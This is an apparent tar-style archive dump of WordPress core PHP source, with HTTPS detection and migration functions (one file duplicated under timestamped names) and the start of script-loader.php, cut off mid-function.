* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605082106-20260621081211.php 0000666 00000011205 15224151220 0013343 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605070331-20260621081108-20260621205532.php 0000666 00000011205 15224151220 0014726 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
script-loader.php 0000666 00000465210 15224151220 0010033 0 ustar 00 <?php
/**
* WordPress scripts and styles default loader.
*
* Several constants are used to manage the loading, concatenating and compression of scripts and CSS:
* define('SCRIPT_DEBUG', true); loads the development (non-minified) versions of all scripts and CSS, and disables compression and concatenation,
* define('CONCATENATE_SCRIPTS', false); disables compression and concatenation of scripts and CSS,
* define('COMPRESS_SCRIPTS', false); disables compression of scripts,
* define('COMPRESS_CSS', false); disables compression of CSS,
* define('ENFORCE_GZIP', true); forces gzip for compression (default is deflate).
*
* The globals $concatenate_scripts, $compress_scripts and $compress_css can be set by plugins
* to temporarily override the above settings. Also a compression test is run once and the result is saved
* as option 'can_compress_scripts' (0/1). The test will run again if that option is deleted.
*
* @package WordPress
*/
/** WordPress Dependency Class */
require ABSPATH . WPINC . '/class-wp-dependency.php';
/** WordPress Dependencies Class */
require ABSPATH . WPINC . '/class-wp-dependencies.php';
/** WordPress Scripts Class */
require ABSPATH . WPINC . '/class-wp-scripts.php';
/** WordPress Scripts Functions */
require ABSPATH . WPINC . '/functions.wp-scripts.php';
/** WordPress Styles Class */
require ABSPATH . WPINC . '/class-wp-styles.php';
/** WordPress Styles Functions */
require ABSPATH . WPINC . '/functions.wp-styles.php';
/**
* Registers TinyMCE scripts.
*
* @since 5.0.0
*
* @global string $tinymce_version
* @global bool $concatenate_scripts
* @global bool $compress_scripts
*
* @param WP_Scripts $scripts WP_Scripts object.
* @param bool $force_uncompressed Whether to forcibly prevent gzip compression. Default false.
*/
function wp_register_tinymce_scripts( $scripts, $force_uncompressed = false ) {
global $tinymce_version, $concatenate_scripts, $compress_scripts;
$suffix = wp_scripts_get_suffix();
$dev_suffix = wp_scripts_get_suffix( 'dev' );
script_concat_settings();
$compressed = $compress_scripts && $concatenate_scripts && ! $force_uncompressed;
/*
* Load tinymce.js when running from /src, otherwise load wp-tinymce.js (in production)
* or tinymce.min.js (when SCRIPT_DEBUG is true).
*/
if ( $compressed ) {
$scripts->add( 'wp-tinymce', includes_url( 'js/tinymce/' ) . 'wp-tinymce.js', array(), $tinymce_version );
} else {
$scripts->add( 'wp-tinymce-root', includes_url( 'js/tinymce/' ) . "tinymce$dev_suffix.js", array(), $tinymce_version );
$scripts->add( 'wp-tinymce', includes_url( 'js/tinymce/' ) . "plugins/compat3x/plugin$dev_suffix.js", array( 'wp-tinymce-root' ), $tinymce_version );
}
$scripts->add( 'wp-tinymce-lists', includes_url( "js/tinymce/plugins/lists/plugin$suffix.js" ), array( 'wp-tinymce' ), $tinymce_version );
}
/**
* Registers all the WordPress vendor scripts that are in the standardized
* `js/dist/vendor/` location.
*
* For the order of `$scripts->add` see `wp_default_scripts`.
*
* @since 5.0.0
*
* @global WP_Locale $wp_locale WordPress date and time locale object.
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_packages_vendor( $scripts ) {
global $wp_locale;
$suffix = wp_scripts_get_suffix();
$vendor_scripts = array(
'react',
'react-dom' => array( 'react' ),
'react-jsx-runtime' => array( 'react' ),
'regenerator-runtime',
'moment',
'lodash',
'wp-polyfill-fetch',
'wp-polyfill-formdata',
'wp-polyfill-node-contains',
'wp-polyfill-url',
'wp-polyfill-dom-rect',
'wp-polyfill-element-closest',
'wp-polyfill-object-fit',
'wp-polyfill-inert',
'wp-polyfill',
);
$vendor_scripts_versions = array(
'react' => '18.3.1.1', // Final .1 due to switch to UMD build, can be removed in the next update.
'react-dom' => '18.3.1.1', // Final .1 due to switch to UMD build, can be removed in the next update.
'react-jsx-runtime' => '18.3.1',
'regenerator-runtime' => '0.14.1',
'moment' => '2.30.1',
'lodash' => '4.17.21',
'wp-polyfill-fetch' => '3.6.20',
'wp-polyfill-formdata' => '4.0.10',
'wp-polyfill-node-contains' => '4.8.0',
'wp-polyfill-url' => '3.6.4',
'wp-polyfill-dom-rect' => '4.8.0',
'wp-polyfill-element-closest' => '3.0.2',
'wp-polyfill-object-fit' => '2.3.5',
'wp-polyfill-inert' => '3.1.3',
'wp-polyfill' => '3.15.0',
);
foreach ( $vendor_scripts as $handle => $dependencies ) {
if ( is_string( $dependencies ) ) {
$handle = $dependencies;
$dependencies = array();
}
$path = "/wp-includes/js/dist/vendor/$handle$suffix.js";
$version = $vendor_scripts_versions[ $handle ];
$scripts->add( $handle, $path, $dependencies, $version, 1 );
}
did_action( 'init' ) && $scripts->add_inline_script( 'lodash', 'window.lodash = _.noConflict();' );
did_action( 'init' ) && $scripts->add_inline_script(
'moment',
sprintf(
"moment.updateLocale( '%s', %s );",
esc_js( get_user_locale() ),
wp_json_encode(
array(
'months' => array_values( $wp_locale->month ),
'monthsShort' => array_values( $wp_locale->month_abbrev ),
'weekdays' => array_values( $wp_locale->weekday ),
'weekdaysShort' => array_values( $wp_locale->weekday_abbrev ),
'week' => array(
'dow' => (int) get_option( 'start_of_week', 0 ),
),
'longDateFormat' => array(
'LT' => get_option( 'time_format', __( 'g:i a' ) ),
'LTS' => null,
'L' => null,
'LL' => get_option( 'date_format', __( 'F j, Y' ) ),
'LLL' => __( 'F j, Y g:i a' ),
'LLLL' => null,
),
),
JSON_HEX_TAG | JSON_UNESCAPED_SLASHES
)
),
'after'
);
}
/**
* Returns contents of an inline script used in appending polyfill scripts for
* browsers which fail the provided tests. The provided array is a mapping from
* a condition to verify feature support to its polyfill script handle.
*
* @since 5.0.0
*
* @param WP_Scripts $scripts WP_Scripts object.
* @param string[] $tests Features to detect.
* @return string Conditional polyfill inline script.
*/
function wp_get_script_polyfill( $scripts, $tests ) {
$polyfill = '';
foreach ( $tests as $test => $handle ) {
if ( ! array_key_exists( $handle, $scripts->registered ) ) {
continue;
}
$src = $scripts->registered[ $handle ]->src;
$ver = $scripts->registered[ $handle ]->ver;
if ( ! preg_match( '|^(https?:)?//|', $src ) && ! ( $scripts->content_url && str_starts_with( $src, $scripts->content_url ) ) ) {
$src = $scripts->base_url . $src;
}
if ( ! empty( $ver ) ) {
$src = add_query_arg( 'ver', $ver, $src );
}
/** This filter is documented in wp-includes/class-wp-scripts.php */
$src = esc_url( apply_filters( 'script_loader_src', $src, $handle ) );
if ( ! $src ) {
continue;
}
$polyfill .= (
// Test presence of feature...
'( ' . $test . ' ) || ' .
/*
* ...appending polyfill on any failures. Cautious viewers may balk
* at the `document.write`. Its caveat of synchronous mid-stream
* blocking write is exactly the behavior we need though.
*/
'document.write( \'<script src="' .
$src .
'"></scr\' + \'ipt>\' );'
);
}
return $polyfill;
}
/**
* Registers development scripts that integrate with `@wordpress/scripts`.
*
* @see https://github.com/WordPress/gutenberg/tree/trunk/packages/scripts#start
*
* @since 6.0.0
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_register_development_scripts( $scripts ) {
if (
! defined( 'SCRIPT_DEBUG' ) || ! SCRIPT_DEBUG
|| empty( $scripts->registered['react'] )
|| defined( 'WP_RUN_CORE_TESTS' )
) {
return;
}
$development_scripts = array(
'react-refresh-entry',
'react-refresh-runtime',
);
foreach ( $development_scripts as $script_name ) {
$assets = include ABSPATH . WPINC . '/assets/script-loader-' . $script_name . '.php';
if ( ! is_array( $assets ) ) {
return;
}
$scripts->add(
'wp-' . $script_name,
'/wp-includes/js/dist/development/' . $script_name . '.js',
$assets['dependencies'],
$assets['version']
);
}
// See https://github.com/pmmmwh/react-refresh-webpack-plugin/blob/main/docs/TROUBLESHOOTING.md#externalising-react.
$scripts->registered['react']->deps[] = 'wp-react-refresh-entry';
}
/**
* Registers all the WordPress packages scripts that are in the standardized
* `js/dist/` location.
*
* For the order of `$scripts->add` see `wp_default_scripts`.
*
* @since 5.0.0
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_packages_scripts( $scripts ) {
$suffix = defined( 'WP_RUN_CORE_TESTS' ) ? '.min' : wp_scripts_get_suffix();
/*
* Expects multidimensional array like:
*
* 'a11y.js' => array('dependencies' => array(...), 'version' => '...'),
* 'annotations.js' => array('dependencies' => array(...), 'version' => '...'),
* 'api-fetch.js' => array(...
*/
$assets = include ABSPATH . WPINC . "/assets/script-loader-packages{$suffix}.php";
foreach ( $assets as $file_name => $package_data ) {
$basename = str_replace( $suffix . '.js', '', basename( $file_name ) );
$handle = 'wp-' . $basename;
$path = "/wp-includes/js/dist/{$basename}{$suffix}.js";
if ( ! empty( $package_data['dependencies'] ) ) {
$dependencies = $package_data['dependencies'];
} else {
$dependencies = array();
}
// Add dependencies that cannot be detected and generated by build tools.
switch ( $handle ) {
case 'wp-block-library':
array_push( $dependencies, 'editor' );
break;
case 'wp-edit-post':
array_push( $dependencies, 'media-models', 'media-views', 'postbox', 'wp-dom-ready' );
break;
case 'wp-preferences':
array_push( $dependencies, 'wp-preferences-persistence' );
break;
}
$scripts->add( $handle, $path, $dependencies, $package_data['version'], 1 );
if ( in_array( 'wp-i18n', $dependencies, true ) ) {
$scripts->set_translations( $handle );
}
/*
* Manually set the text direction localization after wp-i18n is printed.
* This ensures that wp.i18n.isRTL() returns true in RTL languages.
* We cannot use $scripts->set_translations( 'wp-i18n' ) to do this
* because WordPress prints a script's translations *before* the script,
* which means, in the case of wp-i18n, that wp.i18n.setLocaleData()
* is called before wp.i18n is defined.
*/
if ( 'wp-i18n' === $handle ) {
$ltr = _x( 'ltr', 'text direction' );
$script = sprintf( "wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ '%s' ] } );", $ltr );
$scripts->add_inline_script( $handle, $script, 'after' );
}
}
}
/**
* Adds inline scripts required for the WordPress JavaScript packages.
*
* @since 5.0.0
* @since 6.4.0 Added relative time strings for the `wp-date` inline script output.
*
* @global WP_Locale $wp_locale WordPress date and time locale object.
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param WP_Scripts $scripts WP_Scripts object.
*/
function wp_default_packages_inline_scripts( $scripts ) {
global $wp_locale, $wpdb;
if ( isset( $scripts->registered['wp-api-fetch'] ) ) {
$scripts->registered['wp-api-fetch']->deps[] = 'wp-hooks';
}
$scripts->add_inline_script(
'wp-api-fetch',
sprintf(
'wp.apiFetch.use( wp.apiFetch.createRootURLMiddleware( "%s" ) );',
sanitize_url( get_rest_url() )
),
'after'
);
$scripts->add_inline_script(
'wp-api-fetch',
implode(
"\n",
array(
sprintf(
'wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "%s" );',
wp_installing() ? '' : wp_create_nonce( 'wp_rest' )
),
'wp.apiFetch.use( wp.apiFetch.nonceMiddleware );',
'wp.apiFetch.use( wp.apiFetch.mediaUploadMiddleware );',
sprintf(
'wp.apiFetch.nonceEndpoint = "%s";',
admin_url( 'admin-ajax.php?action=rest-nonce' )
),
)
),
'after'
);
$meta_key = $wpdb->get_blog_prefix() . 'persisted_preferences';
$user_id = get_current_user_id();
$preload_data = get_user_meta( $user_id, $meta_key, true );
$scripts->add_inline_script(
'wp-preferences',
sprintf(
'( function() {
var serverData = %s;
var userId = "%d";
var persistenceLayer = wp.preferencesPersistence.__unstableCreatePersistenceLayer( serverData, userId );
var preferencesStore = wp.preferences.store;
wp.data.dispatch( preferencesStore ).setPersistenceLayer( persistenceLayer );
} ) ();',
wp_json_encode( $preload_data, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
$user_id
)
);
// Backwards compatibility - configure the old wp-data persistence system.
$scripts->add_inline_script(
'wp-data',
implode(
"\n",
array(
'( function() {',
' var userId = ' . get_current_user_id() . ';',
' var storageKey = "WP_DATA_USER_" + userId;',
' wp.data',
' .use( wp.data.plugins.persistence, { storageKey: storageKey } );',
'} )();',
)
)
);
// Calculate the timezone abbr (EDT, PST) if possible.
$timezone_string = get_option( 'timezone_string', 'UTC' );
$timezone_abbr = '';
if ( ! empty( $timezone_string ) ) {
$timezone_date = new DateTime( 'now', new DateTimeZone( $timezone_string ) );
$timezone_abbr = $timezone_date->format( 'T' );
}
$gmt_offset = get_option( 'gmt_offset', 0 );
$scripts->add_inline_script(
'wp-date',
sprintf(
'wp.date.setSettings( %s );',
wp_json_encode(
array(
'l10n' => array(
'locale' => get_user_locale(),
'months' => array_values( $wp_locale->month ),
'monthsShort' => array_values( $wp_locale->month_abbrev ),
'weekdays' => array_values( $wp_locale->weekday ),
'weekdaysShort' => array_values( $wp_locale->weekday_abbrev ),
'meridiem' => (object) $wp_locale->meridiem,
'relative' => array(
/* translators: %s: Duration. */
'future' => __( '%s from now' ),
/* translators: %s: Duration. */
'past' => __( '%s ago' ),
/* translators: One second from or to a particular datetime, e.g., "a second ago" or "a second from now". */
's' => __( 'a second' ),
/* translators: %d: Duration in seconds from or to a particular datetime, e.g., "4 seconds ago" or "4 seconds from now". */
'ss' => __( '%d seconds' ),
/* translators: One minute from or to a particular datetime, e.g., "a minute ago" or "a minute from now". */
'm' => __( 'a minute' ),
/* translators: %d: Duration in minutes from or to a particular datetime, e.g., "4 minutes ago" or "4 minutes from now". */
'mm' => __( '%d minutes' ),
/* translators: One hour from or to a particular datetime, e.g., "an hour ago" or "an hour from now". */
'h' => __( 'an hour' ),
/* translators: %d: Duration in hours from or to a particular datetime, e.g., "4 hours ago" or "4 hours from now". */
'hh' => __( '%d hours' ),
/* translators: One day from or to a particular datetime, e.g., "a day ago" or "a day from now". */
'd' => __( 'a day' ),
/* translators: %d: Duration in days from or to a particular datetime, e.g., "4 days ago" or "4 days from now". */
'dd' => __( '%d days' ),
/* translators: One month from or to a particular datetime, e.g., "a month ago" or "a month from now". */
'M' => __( 'a month' ),
/* translators: %d: Duration in months from or to a particular datetime, e.g., "4 months ago" or "4 months from now". */
'MM' => __( '%d months' ),
/* translators: One year from or to a particular datetime, e.g., "a year ago" or "a year from now". */
'y' => __( 'a year' ),
/* translators: %d: Duration in years from or to a particular datetime, e.g., "4 years ago" or "4 years from now". */
'yy' => __( '%d years' ),
),
'startOfWeek' => (int) get_option( 'start_of_week', 0 ),
),
'formats' => array(
/* translators: Time format, see https://www.php.net/manual/datetime.format.php */
'time' => get_option( 'time_format', __( 'g:i a' ) ),
/* translators: Date format, see https://www.php.net/manual/datetime.format.php */
'date' => get_option( 'date_format', __( 'F j, Y' ) ),
/* translators: Date/Time format, see https://www.php.net/manual/datetime.format.php */
'datetime' => __( 'F j, Y g:i a' ),
/* translators: Abbreviated date/time format, see https://www.php.net/manual/datetime.format.php */
'datetimeAbbreviated' => __( 'M j, Y g:i a' ),
),
'timezone' => array(
'offset' => (float) $gmt_offset,
'offsetFormatted' => str_replace( array( '.25', '.5', '.75' ), array( ':15', ':30', ':45' ), (string) $gmt_offset ),
'string' => $timezone_string,
'abbr' => $timezone_abbr,
),
),
JSON_HEX_TAG | JSON_UNESCAPED_SLASHES
)
),
'after'
);
// Loading the old editor and its config to ensure the classic block works as expected.
$scripts->add_inline_script(
'editor',
'window.wp.oldEditor = window.wp.editor;',
'after'
);
/*
* wp-editor module is exposed as window.wp.editor.
* Problem: there is quite some code expecting window.wp.oldEditor object available under window.wp.editor.
* Solution: fuse the two objects together to maintain backward compatibility.
* For more context, see https://github.com/WordPress/gutenberg/issues/33203.
*/
$scripts->add_inline_script(
'wp-editor',
'Object.assign( window.wp.editor, window.wp.oldEditor );',
'after'
);
}
/**
* Adds inline scripts required for the TinyMCE in the block editor.
*
* These TinyMCE init settings are used to extend and override the default settings
* from `_WP_Editors::default_settings()` for the Classic block.
*
* @since 5.0.0
*
* @global WP_Scripts $wp_scripts
*/
function wp_tinymce_inline_scripts() {
global $wp_scripts;
/** This filter is documented in wp-includes/class-wp-editor.php */
$editor_settings = apply_filters( 'wp_editor_settings', array( 'tinymce' => true ), 'classic-block' );
$tinymce_plugins = array(
'charmap',
'colorpicker',
'hr',
'lists',
'media',
'paste',
'tabfocus',
'textcolor',
'fullscreen',
'wordpress',
'wpautoresize',
'wpeditimage',
'wpemoji',
'wpgallery',
'wplink',
'wpdialogs',
'wptextpattern',
'wpview',
);
/** This filter is documented in wp-includes/class-wp-editor.php */
$tinymce_plugins = apply_filters( 'tiny_mce_plugins', $tinymce_plugins, 'classic-block' );
$tinymce_plugins = array_unique( $tinymce_plugins );
$disable_captions = false;
// Runs after `tiny_mce_plugins` but before `mce_buttons`.
/** This filter is documented in wp-admin/includes/media.php */
if ( apply_filters( 'disable_captions', '' ) ) {
$disable_captions = true;
}
$toolbar1 = array(
'formatselect',
'bold',
'italic',
'bullist',
'numlist',
'blockquote',
'alignleft',
'aligncenter',
'alignright',
'link',
'unlink',
'wp_more',
'spellchecker',
'wp_add_media',
'wp_adv',
);
/** This filter is documented in wp-includes/class-wp-editor.php */
$toolbar1 = apply_filters( 'mce_buttons', $toolbar1, 'classic-block' );
$toolbar2 = array(
'strikethrough',
'hr',
'forecolor',
'pastetext',
'removeformat',
'charmap',
'outdent',
'indent',
'undo',
'redo',
'wp_help',
);
/** This filter is documented in wp-includes/class-wp-editor.php */
$toolbar2 = apply_filters( 'mce_buttons_2', $toolbar2, 'classic-block' );
/** This filter is documented in wp-includes/class-wp-editor.php */
$toolbar3 = apply_filters( 'mce_buttons_3', array(), 'classic-block' );
/** This filter is documented in wp-includes/class-wp-editor.php */
$toolbar4 = apply_filters( 'mce_buttons_4', array(), 'classic-block' );
/** This filter is documented in wp-includes/class-wp-editor.php */
$external_plugins = apply_filters( 'mce_external_plugins', array(), 'classic-block' );
$tinymce_settings = array(
'plugins' => implode( ',', $tinymce_plugins ),
'toolbar1' => implode( ',', $toolbar1 ),
'toolbar2' => implode( ',', $toolbar2 ),
'toolbar3' => implode( ',', $toolbar3 ),
'toolbar4' => implode( ',', $toolbar4 ),
'external_plugins' => wp_json_encode( $external_plugins ),
'classic_block_editor' => true,
);
if ( $disable_captions ) {
$tinymce_settings['wpeditimage_disable_captions'] = true;
}
if ( ! empty( $editor_settings['tinymce'] ) && is_array( $editor_settings['tinymce'] ) ) {
$tinymce_settings = array_merge( $tinymce_settings, $editor_settings['tinymce'] );
}
/** This filter is documented in wp-includes/class-wp-editor.php */
$tinymce_settings = apply_filters( 'tiny_mce_before_init', $tinymce_settings, 'classic-block' );
/*
* Do "by hand" translation from PHP array to js object.
* Prevents breakage in some custom settings.
*/
$init_obj = '';
foreach ( $tinymce_settings as $key => $value ) {
if ( is_bool( $value ) ) {
$val = $value ? 'true' : 'false';
$init_obj .= $key . ':' . $val . ',';
continue;
} elseif ( ! empty( $value ) && is_string( $value ) && (
( '{' === $value[0] && '}' === $value[ strlen( $value ) - 1 ] ) ||
( '[' === $value[0] && ']' === $value[ strlen( $value ) - 1 ] ) ||
preg_match( '/^\(?function ?\(/', $value ) ) ) {
$init_obj .= $key . ':' . $value . ',';
continue;
}
$init_obj .= $key . ':"' . $value . '",';
}
$init_obj = '{' . trim( $init_obj, ' ,' ) . '}';
$script = 'window.wpEditorL10n = {
tinymce: {
